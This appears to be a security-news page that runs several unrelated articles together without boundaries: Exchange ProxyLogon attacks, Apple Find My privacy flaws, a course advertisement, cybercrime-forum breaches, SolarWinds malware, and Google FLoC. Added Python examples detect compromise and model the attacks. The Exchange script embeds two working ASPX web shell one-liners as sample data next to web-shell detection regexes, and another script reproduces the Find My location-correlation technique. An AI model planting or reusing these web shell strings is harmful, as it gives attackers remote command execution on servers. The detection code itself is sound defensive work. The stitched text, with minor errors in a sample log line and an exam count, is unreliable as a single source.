Microsoft Exchange Cyber Attack

Microsoft on Friday warned of active attacks by multiple threat actors exploiting unpatched Exchange Servers, as the hacking campaign is believed to have compromised tens of thousands of businesses and government entities in the U.S., Asia, and Europe.

The company said “it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,” signaling an escalation that the breaches are no longer “limited and targeted” as was previously deemed.

According to independent cybersecurity journalist Brian Krebs, at least 30,000 entities across the U.S. — mainly small businesses, towns, cities, and local governments — have been compromised by an “unusually aggressive” Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.

Victims are also being reported from outside the U.S., with email systems belonging to businesses in Norway and the Czech Republic impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and “continuously notify these companies.”

The colossal scale of the ongoing offensive against Microsoft’s email servers also eclipses the SolarWinds hacking spree that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on the initial reconnaissance of the victim machines.

Unpatched Exchange Servers at Risk of Exploitation

Successful exploitation of the flaws lets adversaries break into on-premises Exchange Servers in target environments and then install web shells (web-based backdoors) that give them long-term access independent of the original vulnerability. With multiple threat actors leveraging these zero-day vulnerabilities, post-exploitation activity is expected to differ from one group to another depending on their motives.

The four security issues in question (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) were patched by Microsoft as part of an emergency out-of-band security update last Tuesday, with a warning that “many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.”

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an emergency directive warning of “active exploitation” of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.

“CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft’s IoC detection tool to help determine compromise,” the agency tweeted on March 6.

It’s worth noting that merely installing the patches issued by Microsoft has no effect on servers that have already been backdoored: the updates close the entry point but do not remove anything an attacker left behind. Organizations that have been breached, with web shells and other post-exploitation tools deployed, remain at risk of future compromise until those artifacts are completely rooted out of their networks.
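As an added illustration of what the log scanning and web shell hunting mentioned above look like in practice (example code written for this page, not Microsoft’s Test-ProxyLogon script or MSERT): Microsoft’s HAFNIUM guidance pointed to HttpProxy log rows whose AnchorMailbox field has the form `ServerInfo~*/*` as an indicator of CVE-2021-26855 exploitation, and to `.aspx` drop locations such as `inetpub\wwwroot\aspnet_client` and `FrontEnd\HttpProxy\owa\auth` for web shells. The log excerpt, the file contents and the directory paths below are constructed so the script runs offline; the column set is simplified, the regexes are my own, and a real hunt would read the logs and web roots from disk.

```python
"""Two ProxyLogon-era checks over constructed data (added example)."""
import csv
import io
import re

# Constructed HttpProxy log excerpt (real logs have many more columns).
# req-1 and req-3 carry the "ServerInfo~<backend>/<path>" AnchorMailbox
# shape seen in CVE-2021-26855 SSRF requests; req-2 is a normal OWA row.
HTTPPROXY_SAMPLE = """\
DateTime,RequestId,ClientIpAddress,UrlHost,UrlStem,AnchorMailbox
2021-03-03T10:12:01Z,req-1,203.0.113.5,mail.example.com,/owa/auth/x.js,ServerInfo~a]@mail.example.com/autodiscover/autodiscover.xml
2021-03-03T10:13:45Z,req-2,198.51.100.7,mail.example.com,/owa/,Sid~S-1-5-21-1004-500
2021-03-03T10:14:02Z,req-3,203.0.113.5,mail.example.com,/ecp/y.js,ServerInfo~mail.example.com/ecp/DDI/DDIService.svc/SetObject
"""


def ssrf_hits(log_text: str) -> list:
    """Rows whose AnchorMailbox matches ServerInfo~*/* (the 26855 indicator)."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        anchor = row.get("AnchorMailbox", "")
        if anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append(row)
    return hits


def attacker_ips(hits: list) -> set:
    """Source addresses to pivot on in firewall and other server logs."""
    return {h["ClientIpAddress"] for h in hits}


# Constructed web-root listing: path -> file content.  Paths mirror the
# drop locations named in Microsoft's guidance; contents are made up.
WEBROOT_SAMPLE = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\log.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><html>legitimate logon page</html>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFE.aspx":
        '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start(Request.Form["cmd"]); %>',
}

# Illustrative patterns (assumption): China Chopper-style eval of request
# input, process spawning, and server-side script blocks that read input.
WEBSHELL_PATTERNS = [
    re.compile(r"eval\s*\(\s*Request", re.I),
    re.compile(r"System\.Diagnostics\.Process", re.I),
    re.compile(r'runat\s*=\s*"server".{0,200}Request\[', re.I | re.S),
]


def webshell_candidates(files: dict) -> list:
    """Server-side script files whose body matches a web shell pattern."""
    out = []
    for path, body in files.items():
        if not path.lower().endswith((".aspx", ".ashx", ".asmx")):
            continue
        if any(p.search(body) for p in WEBSHELL_PATTERNS):
            out.append(path)
    return sorted(out)


if __name__ == "__main__":
    hits = ssrf_hits(HTTPPROXY_SAMPLE)
    print("SSRF rows:", [h["RequestId"] for h in hits], "from", attacker_ips(hits))
    print("web shell candidates:", webshell_candidates(WEBROOT_SAMPLE))
```

Both checks are evidence of compromise, not of exposure: a server can be fully patched and still show these hits, which is exactly the case the paragraph above describes.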

Multiple Clusters Spotted

FireEye’s Mandiant threat intelligence team said it “observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment” since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.

Not much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.

In a statement to Reuters, a Chinese government spokesman denied the country was behind the intrusions.

“There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,” said Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.

In one instance, the firm observed that some compromised Exchange servers had been seeded with cryptocurrency-mining malware called DLTminer, a family documented by Carbon Black in 2019.

“One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,” Nickels said. “Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.”

Microsoft Issues Mitigation Guidance

Microsoft has published alternative mitigation guidance for Exchange customers who need more time to patch their deployments, pushed out an update to the Microsoft Safety Scanner (MSERT) tool so that it detects the web shells seen in these attacks, and released a script for checking servers for HAFNIUM indicators of compromise.

“These vulnerabilities are significant and need to be taken seriously,” Mat Gangwer, senior director of managed threat response at Sophos said. “They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.”

“The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,” Gangwer added.

Cybersecurity researchers on Thursday disclosed two distinct design and implementation flaws in Apple’s crowdsourced Bluetooth location tracking system that can lead to a location correlation attack and to unauthorized access to a user’s location history for the past seven days, thereby deanonymizing users.

The findings are a consequence of an exhaustive review undertaken by the Open Wireless Link (OWL) project, a team of researchers from the Secure Mobile Networking Lab at the Technical University of Darmstadt, Germany, who have historically taken apart Apple’s wireless ecosystem with the goal of identifying security and privacy issues.

The researchers said Apple partially addressed the issues after they were reported on July 2, 2020. Citing the privacy implications of the analysis, the team used only data from their own devices for the study.

How Find My Works

Apple devices come with a feature called Find My that makes it easy for users to locate other Apple devices, including iPhone, iPad, iPod touch, Apple Watch, Mac, or AirPods. With the upcoming iOS 14.5, the company is expected to add support for Bluetooth tracking devices — called AirTags — that can be attached to items like keys and wallets, which in turn can be used for tracking purposes right from within the Find My app.

What’s more interesting is the technology that undergirds Find My. Called offline finding and introduced in 2019, the feature has a lost Apple device broadcast Bluetooth Low Energy (BLE) signals, allowing other Apple devices in close proximity to relay the lost device’s location to Apple’s servers.

Put differently, offline finding turns every Apple device into a potential broadcast beacon and every nearby Apple device into a potential finder, in a crowdsourced location tracking mechanism that is designed to be both end-to-end encrypted and anonymous: no third party, including Apple, is supposed to be able to decrypt those locations and build a history of a user’s whereabouts.

This is achieved via a rotating key scheme. Each device generates public-private key pairs and includes the current public key in the Bluetooth advertisements it emits; the key material is synchronized via iCloud to all other Apple devices linked to the same user (i.e., Apple ID).

A nearby iPhone or iPad (with no connection to the original offline device) that picks up this message checks its own location, then encrypts the information using the aforementioned public key before sending it to the cloud along with a hash of the public key.

In the final step, the owner uses a second Apple device signed in with the same Apple ID: it uploads the same hash of the public key to look up matching reports on Apple’s servers, and the Find My app then decrypts the returned reports with the corresponding private key to recover the last known location.

Issues with Correlation and Tracking

Since the approach follows a public key encryption (PKE) setup, even Apple cannot decrypt the location, as it does not possess the private key. While the company has not explicitly revealed how often the key rotates, the rolling key pair design makes it difficult for malicious parties to use the Bluetooth beacons to track users’ movements.

But the OWL researchers said the design allows Apple, in its role as the service provider, to correlate different owners’ locations if their reports are submitted by the same finder devices, effectively allowing Apple to construct what they call a social graph.

“Law enforcement agencies could exploit this issue to deanonymize participants of (political) demonstrations even when participants put their phones in flight mode,” the researchers said, adding “malicious macOS applications can retrieve and decrypt the [offline finding] location reports of the last seven days for all its users and for all of their devices as cached rolling advertisement keys are stored on the file system in cleartext.”

In other words, the macOS Catalina vulnerability (CVE-2020-9986) could allow an attacker to access the decryption keys, using them to download and decrypt location reports submitted by the Find My network, and ultimately locate and identify their victims with high accuracy. The weakness was patched by Apple in November 2020 (version macOS 10.15.7) with “improved access restrictions.”
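To make the protocol steps above and the two findings concrete, here is a toy re-implementation of the offline-finding data flow (an added example written for this page, not Apple’s code and not OWL’s tooling). Real devices use elliptic-curve keys with authenticated encryption; to keep the script on the Python standard library, a standard Diffie-Hellman group (RFC 3526 group 14) stands in for the curve and an HMAC-derived key stream with an HMAC tag stands in for AES-GCM. Rotation keys are derived from a master secret by an epoch counter, the report format, the finder identifier the server keeps, and the sample location are all assumptions. The `finder_graph` method is the correlation the researchers describe: a server that knows which finder submitted each report can link owners who were near the same finder, and anyone holding the owner’s cached rotation keys (the macOS cleartext-cache issue) can run the same lookup-and-decrypt as the owner.

```python
"""Toy offline-finding flow: beacon, finder, server, owner (added example)."""
import hashlib
import hmac
import secrets
from collections import defaultdict

# RFC 3526 group 14 prime (2048-bit MODP): a public standard constant.
P = int("".join("""
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74
020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437
4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED
EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05
98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB
9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B
E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718
3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
""".split()), 16)
G = 2
PLEN = (P.bit_length() + 7) // 8


def hkdf(ikm: bytes, info: bytes, length: int) -> bytes:
    """HKDF-SHA256 (RFC 5869) with an empty salt."""
    prk = hmac.new(b"\x00" * 32, ikm, hashlib.sha256).digest()
    out, block, i = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([i]), hashlib.sha256).digest()
        out, i = out + block, i + 1
    return out[:length]


def rotating_keypair(master: bytes, epoch: int):
    """Owner-side key pair for rotation period `epoch` (assumed counter-based
    derivation); re-derivable on every device that holds the master secret."""
    seed = hkdf(master, b"rotate" + epoch.to_bytes(4, "big"), PLEN)
    x = int.from_bytes(seed, "big") % (P - 3) + 2
    return x, pow(G, x, P)


def key_id(pub: int) -> str:
    """Finder and owner both refer to a key by its SHA-256, never the key."""
    return hashlib.sha256(pub.to_bytes(PLEN, "big")).hexdigest()


def _stream_keys(shared: int):
    k = hkdf(shared.to_bytes(PLEN, "big"), b"report", 64)
    return k[:32], k[32:]


def finder_report(beacon_pub: int, location: bytes, finder_id: str) -> dict:
    """Finder: ephemeral DH against the advertised key, encrypt its own
    location, upload hash + ciphertext.  It learns nothing about the owner."""
    assert len(location) <= 32
    r = secrets.randbelow(P - 3) + 2
    enc_key, mac_key = _stream_keys(pow(beacon_pub, r, P))
    ct = bytes(a ^ b for a, b in zip(location, enc_key))
    tag = hmac.new(mac_key, ct, hashlib.sha256).digest()
    return {"id": key_id(beacon_pub), "eph": pow(G, r, P), "ct": ct,
            "tag": tag, "finder": finder_id}


def owner_decrypt(priv: int, report: dict) -> bytes:
    """Owner (or anyone holding the cached private key) opens a report."""
    enc_key, mac_key = _stream_keys(pow(report["eph"], priv, P))
    expect = hmac.new(mac_key, report["ct"], hashlib.sha256).digest()
    if not hmac.compare_digest(expect, report["tag"]):
        raise ValueError("report was not encrypted to this key")
    return bytes(a ^ b for a, b in zip(report["ct"], enc_key))


def can_decrypt(priv: int, report: dict) -> bool:
    try:
        owner_decrypt(priv, report)
        return True
    except ValueError:
        return False


class FindMyServer:
    """The service provider: stores reports by key hash, answers hash queries."""
    def __init__(self):
        self.reports = defaultdict(list)

    def upload(self, report: dict) -> None:
        self.reports[report["id"]].append(report)

    def fetch(self, ids) -> list:
        return [r for i in ids for r in self.reports.get(i, [])]

    def finder_graph(self) -> dict:
        """finder -> key hashes it reported.  Keys reported by the same
        finder belonged to owners who were physically near each other."""
        seen = defaultdict(set)
        for kid, reps in self.reports.items():
            for r in reps:
                seen[r["finder"]].add(kid)
        return {f: ids for f, ids in seen.items() if len(ids) > 1}


def demo():
    """Two owners' beacons seen by one finder; owner A recovers the location."""
    server = FindMyServer()
    master_a, master_b = secrets.token_bytes(32), secrets.token_bytes(32)
    loc = b"lat=49.8728,lon=8.6512"  # constructed sample location
    server.upload(finder_report(rotating_keypair(master_a, 7)[1], loc, "finder-1"))
    server.upload(finder_report(rotating_keypair(master_b, 7)[1], loc, "finder-1"))
    # Owner A re-derives keys for recent epochs and queries by hash only.
    keys = {key_id(pub): priv
            for priv, pub in (rotating_keypair(master_a, e) for e in range(5, 10))}
    recovered = [owner_decrypt(keys[r["id"]], r) for r in server.fetch(keys)]
    return recovered, server.finder_graph()
```

Note what the server never sees: the plaintext location, the public key itself, or the owner’s identity. What it does see, and what `finder_graph` exploits, is the finder device behind each upload, which is enough to link owners without breaking any cryptography.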

A second outcome of the investigation is an app that’s designed to let any user create an “AirTag.” Called OpenHaystack, the framework allows for tracking personal Bluetooth devices via Apple’s massive Find My network, enabling users to create their own tracking tags that can be appended to physical objects or integrated into other Bluetooth-capable devices.

This is not the first time researchers from Open Wireless Link (OWL) have uncovered flaws in Apple’s closed-source protocols by means of reverse engineering.

In May 2019, the researchers disclosed vulnerabilities in Apple’s Wireless Direct Link (AWDL) proprietary mesh networking protocol that permitted attackers to track users, crash devices, and even intercept files transferred between devices via man-in-the-middle (MitM) attacks.

This was later adapted by Google Project Zero researcher Ian Beer to uncover a critical “wormable” iOS bug last year that could have made it possible for a remote adversary to gain complete control of any Apple device in the vicinity over Wi-Fi.

As cloud computing continues to grow, Google Cloud is quickly becoming one of the most popular solutions.

However, relatively few engineers know this platform well.

This leaves the door open for aspiring IT professionals who take the official exams.

The Google Cloud Certifications Practice Tests + Courses Bundle helps you get certified faster, with 43 hours of video content and over 1,000 practice questions.

It covers seven Google exams, providing all the prep you could possibly need.

You would normally expect to pay $639 for this training, but ‘The Hacker News’ has put together an eye-catching deal with Whizlabs Learning Center.

Special Offer: For a limited time, you can pick up all the content mentioned above for just $29.99 with this bundle. That means you save over $600 on the full price!

As the demand for cloud computing experts grows, salaries are increasing.

According to Glassdoor, engineers earn $117,785 a year on average.

This bundle helps you join the gold rush, with seven courses working towards Google Certified Professional exams: Cloud Architect, Cloud Security Engineer, Data Engineer, Cloud Network Engineer, and Cloud Developer.

The courses cover everything you need to know to pass the test, along with plenty of practical knowledge. Just as importantly, you get practice exams to hone your skills.

The training comes from Whizlabs Learning Center, which has helped over 3 million students in the past 17 years.

Want to get started? Grab the training today to save 95% on lifetime access!

Mazafaka

In what’s a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year.

The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating “Your data has been leaked” and “This forum has been hacked.”

“The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details,” cybersecurity firm Intel 471 said.

Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to have been operational as early as 2003, acting as an exclusive online space for cybercriminals to trade ransomware-as-a-service tools and conduct other forms of illicit cyber operations.

The development comes close on the heels of successful breaches of other forums, including that of Verified, Crdclub, and Exploit.

Verified is said to have been breached on January 20, 2021, with the actor behind the attack claiming on another popular forum, Raid Forums, to have access to Verified’s entire database, in addition to transferring $150,000 worth of cryptocurrency from Verified’s bitcoin wallet to their own. The forum nevertheless returned on February 18 under new ownership, according to Flashpoint.

Then, in February, a cybercrime forum by the name of Crdclub disclosed an attack that resulted in the compromise of an administrator account, which was used to defraud its members. No other personal information appears to have been taken.

“By doing so, the actor behind the attack was able to lure forum customers to use a money transfer service that was allegedly vouched for by the forum’s admins,” Intel 471 said. “That was a lie, and resulted in an unknown amount of money being diverted from the forum.”

Lastly, earlier this week, the Exploit cybercrime forum sustained an attack that involved an apparent compromise of a proxy server used for safeguarding the forum from distributed denial-of-service (DDoS) attacks.

Details are fuzzy as to the perpetrators of the attacks, with forum members speculating that it could be the work of a government intelligence agency, while also distressing over the possibility that their real-world identities could be exposed in the wake of the leaks.

Flashpoint researchers noted that the Russian sentences on the Maza forum’s notification page were possibly translated using an online translator, but added it’s unclear if this implies the involvement of a non-Russian speaking actor or if it was deliberately used to mislead attribution.

“While Intel 471 isn’t aware of anyone claiming responsibility for the breaches, whoever is behind the actions has indirectly given researchers an advantage,” the company concluded. “Any information unearthed from the breaches aids in the fight against these criminals due to the added visibility it gives security teams who are tracking actors that populate these forums.”

FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a “sophisticated second-stage backdoor,” as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor’s tactics and techniques.

Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot, Sunburst (or Solorigate), Teardrop, and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives.

“These tools are new pieces of malware that are unique to this actor,” Microsoft said. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions.”

Microsoft also took the opportunity to name the actor behind the attacks against SolarWinds as NOBELIUM, which is also being tracked under different monikers by the cybersecurity community, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).

While Sunspot was deployed into the build environment to inject the Sunburst backdoor into SolarWinds’s Orion network monitoring platform, Teardrop and Raindrop have been primarily used as post-exploitation tools to laterally move across the network and deliver the Cobalt Strike Beacon.

Spotted between August and September 2020, SUNSHUTTLE is a Golang-based malware that acts as a command-and-control backdoor, establishing a secure connection with an attacker-controlled server to receive commands to download and execute files, upload files from the system to the server, and execute operating system commands on the compromised machine.

For its part, FireEye said it observed the malware at a victim compromised by UNC2452, but added it hasn’t been able to fully verify the backdoor’s connection to the threat actor. The company also stated it discovered SUNSHUTTLE in August 2020 after it was uploaded to a public malware repository by an unnamed U.S.-based entity.

One of the most notable features of GoldMax is the ability to cloak its malicious network traffic with seemingly benign traffic by pseudo-randomly selecting referrers from a list of popular website URLs (such as www.bing.com, www.yahoo.com, www.facebook.com, www.twitter.com, and www.google.com) for decoy HTTP GET requests pointing to C2 domains.

“The new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection evasion techniques via its ‘blend-in’ traffic capabilities for C2 communications,” FireEye detailed. “SUNSHUTTLE would function as a second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools.”
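The decoy referers described above are a cheap trick to defeat, because a genuine Referer header is preceded by a visit to the referring site from the same client. The following added example (my own detection heuristic, not FireEye’s or Microsoft’s analytics) runs that logic over a constructed proxy log: for each client and destination host, it counts popular-site referers that the client claimed without ever having requested that referer’s host first. The destination domain, client addresses and timestamps are constructed; the referer list is the one the article quotes.

```python
"""Flag 'blend-in' Referer headers with no preceding visit (added example)."""
from collections import defaultdict
from urllib.parse import urlsplit

# Referers the article lists as GoldMax's decoy pool.
DECOY_REFERERS = {"www.bing.com", "www.yahoo.com", "www.facebook.com",
                  "www.twitter.com", "www.google.com"}

# Constructed proxy log: (timestamp, client, method, url, referer).
# 10.0.0.8 is a real user who searched and clicked a result.
# 10.0.0.23 beacons to one host every five minutes with a rotating decoy.
PROXY_SAMPLE = [
    ("2020-09-01T09:00:01Z", "10.0.0.8", "GET",
     "https://www.google.com/search?q=exchange", ""),
    ("2020-09-01T09:00:05Z", "10.0.0.8", "GET",
     "https://docs.microsoft.com/en-us/exchange", "https://www.google.com/"),
    ("2020-09-01T09:01:00Z", "10.0.0.23", "GET",
     "https://cdn-updates-example.net/api/v1/status", "https://www.bing.com/"),
    ("2020-09-01T09:06:00Z", "10.0.0.23", "GET",
     "https://cdn-updates-example.net/api/v1/status", "https://www.yahoo.com/"),
    ("2020-09-01T09:11:00Z", "10.0.0.23", "GET",
     "https://cdn-updates-example.net/api/v1/status", "https://www.facebook.com/"),
    ("2020-09-01T09:16:00Z", "10.0.0.23", "GET",
     "https://cdn-updates-example.net/api/v1/status", "https://www.twitter.com/"),
]


def suspicious_referers(rows, min_distinct: int = 3) -> dict:
    """Return {(client, destination host): set of decoy referer hosts} for
    pairs where the client claimed at least `min_distinct` different popular
    referers without having visited any of them beforehand."""
    visited = defaultdict(set)       # client -> hosts it has actually requested
    unjustified = defaultdict(set)   # (client, dst) -> unexplained referer hosts
    for _ts, client, _method, url, referer in rows:  # rows must be time-ordered
        dst = urlsplit(url).netloc.lower()
        ref_host = urlsplit(referer).netloc.lower() if referer else ""
        if ref_host in DECOY_REFERERS and ref_host not in visited[client]:
            unjustified[(client, dst)].add(ref_host)
        visited[client].add(dst)
    return {k: v for k, v in unjustified.items() if len(v) >= min_distinct}


if __name__ == "__main__":
    for (client, dst), refs in suspicious_referers(PROXY_SAMPLE).items():
        print(f"{client} -> {dst}: {len(refs)} unexplained popular referers {sorted(refs)}")
```

The threshold exists because a single unexplained referer is noise (bookmarks, sanitized referers, new browser sessions); several different ones to the same host from one client is the beacon’s signature. Pair it with the fixed request interval visible in the sample and you have a workable hunt query for any proxy that logs Referer.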

GoldFinder, also written in Go, is an HTTP tracer tool for logging the route a packet takes to reach a C2 server. In contrast, Sibot is a dual-purpose malware implemented in VBScript that’s designed to achieve persistence on infected machines before downloading and executing a payload from the C2 server. Microsoft said it observed three obfuscated variants of Sibot.

Even as the different pieces of the SolarWinds attack puzzle fall into place, the development once again underscores the scope and sophistication of the methods used to penetrate, propagate, and persist in victim environments.

“These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor’s sophistication,” Microsoft said. “In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams.”

Google FLoC and FLEDGE

Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022.

“Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers,” said David Temkin, Google’s director of product management for ads privacy and trust.

“Advances in aggregation, anonymization, on-device processing and other privacy-preserving technologies offer a clear path to replacing individual identifiers.”

The changes, which could potentially reshape the advertising landscape, are expected only to cover websites visited via Chrome and do not extend to mobile apps.

At the same time, Google acknowledged that other companies might find alternative ways to track individual users. “We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not,” Temkin said. “We don’t believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions.”

Over the years, third-party cookies have become the mainstay driving digital ad business, but mounting concerns about data privacy infringement have led major browser vendors such as Apple, Mozilla, Brave, and Microsoft to introduce countermeasures to pull the plug on invasive tracking technology, in turn forcing Google to respond with similar privacy-first solutions or risk losing customer trust.

FLoC and FLEDGE for Privacy-Preserving Ad Targeting

For its part, the search giant — in an attempt to balance its twin roles as a web browser developer and owner of the world’s largest advertising platform — early last year announced plans to eliminate third-party cookies in Chrome in favor of a new framework called the “Privacy Sandbox,” which aims to protect anonymity while still delivering targeted ads without resorting to more opaque techniques like fingerprinting.

To that effect, Google has proposed a continually evolving collection of bird-themed ad targeting and measurement methods aimed at supplanting third-party cookies, chief among them being Federated Learning of Cohorts (FLoC) and TURTLEDOVE, which it hopes will emerge the standards for serving ads on the web.

Using on-device processing of a user’s browsing history, FLoC essentially aims to classify online users into groups based on similar browsing behavior, with each user’s browser sharing what’s called a “cohort ID” with websites and marketers, who can then target users with ads based on the group they belong to.

In other words, the data gathered locally from the browser is never shared and never leaves the device. By using this interest-based advertising approach, the idea is to hide users “in the crowd,” thereby keeping a person’s browsing history private and offering protections from individualized tracking and profiling.

TURTLEDOVE (and its extension, FLEDGE), on the other hand, proposes a new way for advertisers and ad tech companies to target an ad to an audience they have previously built without revealing other information about a user’s browsing habits or ad interests.

Google is set to test FLoC-based cohorts publicly later this month, starting with Chrome 89, before extending the trials with advertisers in Google Ads in the second quarter.

Concerns About Control, Privacy, and Trust

While these privacy-preserving plans mean less personal data is sent to third parties, questions are being raised about how users will be grouped together and what guardrails are being put in place to avoid unlawful discrimination against certain groups based on sensitive attributes such as ethnicity, religion, gender, or sexual orientation.

Outlining that the change in underlying infrastructure involves sharing new information with advertisers, the Electronic Frontier Foundation (EFF) equated FLoC to a “behavioral credit score,” calling it a “terrible idea” that creates new privacy risks, including the likelihood of websites to uniquely fingerprint FLoC users and access more personal information than required to serve relevant ads.

“If you visit a site for medical information, you might trust it with information about your health, but there’s no reason it needs to know what your politics are,” EFF’s Bennett Cyphers said. “Likewise, if you visit a retail website, it shouldn’t need to know whether you’ve recently read up on treatment for depression. FLoC erodes this separation of contexts, and instead presents the same behavioral summary to everyone you interact with.”
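To show what “grouping users by browsing behavior on the device” and EFF’s fingerprinting objection mean mechanically, here is an added example, written for this page and not Chrome’s implementation. Chrome’s origin trial derived cohorts with SimHash over the registrable domains a user visited; the hash width, the number of leading bits taken as the cohort ID, the k-anonymity threshold and the synthetic browsing histories below are assumptions made for the example.

```python
"""FLoC-style cohort IDs via SimHash, with k-anonymity and a leak measure."""
import hashlib
import math
import random
from collections import Counter

HASH_BITS = 50    # width of the SimHash fingerprint (assumed)
COHORT_BITS = 12  # leading bits exposed as the cohort ID (assumed)


def _domain_bits(domain: str) -> int:
    """Stable per-domain hash truncated to HASH_BITS."""
    h = hashlib.sha256(domain.lower().encode()).digest()
    return int.from_bytes(h[:8], "big") & ((1 << HASH_BITS) - 1)


def simhash(domains) -> int:
    """SimHash: every domain votes +1/-1 on each bit and the majority sets the
    bit, so histories that share most domains land on nearby hashes."""
    votes = [0] * HASH_BITS
    for d in set(domains):
        h = _domain_bits(d)
        for i in range(HASH_BITS):
            votes[i] += 1 if (h >> i) & 1 else -1
    return sum(1 << i for i, v in enumerate(votes) if v > 0)


def cohort_id(history) -> int:
    """What leaves the device: a short prefix of the SimHash, not the history."""
    return simhash(history) >> (HASH_BITS - COHORT_BITS)


def hamming(a: int, b: int) -> int:
    return bin(a ^ b).count("1")


def anonymity_set(population, cohort: int) -> int:
    """Number of histories in `population` that map to `cohort`."""
    return sum(1 for h in population if cohort_id(h) == cohort)


def fingerprint_bits(population, cohort: int) -> float:
    """Identifying information a site gains by learning the cohort ID,
    log2(N / |anonymity set|): the EFF 'extra fingerprinting surface'."""
    return math.log2(len(population) / anonymity_set(population, cohort))


def k_anonymous(population, k: int) -> dict:
    """The guardrail: cohorts with fewer than k members must not be exposed.
    Returns cohort -> size for exposed cohorts, cohort -> None for suppressed."""
    sizes = Counter(cohort_id(h) for h in population)
    return {c: (n if n >= k else None) for c, n in sizes.items()}


def constructed_population(n: int = 200, seed: int = 1) -> list:
    """Synthetic histories (constructed): users alternate between two interest
    clusters of made-up domains plus a little random browsing."""
    rng = random.Random(seed)
    pool = [f"site{i}.example" for i in range(20)]
    cluster_a, cluster_b = pool[:10], pool[10:]
    return [rng.sample(cluster_a if u % 2 == 0 else cluster_b, 6) + rng.sample(pool, 2)
            for u in range(n)]


if __name__ == "__main__":
    pop = constructed_population()
    c = cohort_id(pop[0])
    print(f"user0 cohort={c:#x} shares it with {anonymity_set(pop, c)} of {len(pop)} "
          f"users -> {fingerprint_bits(pop, c):.2f} bits leaked to every site")
    print("suppressed cohorts:", sum(v is None for v in k_anonymous(pop, 20).values()))
```

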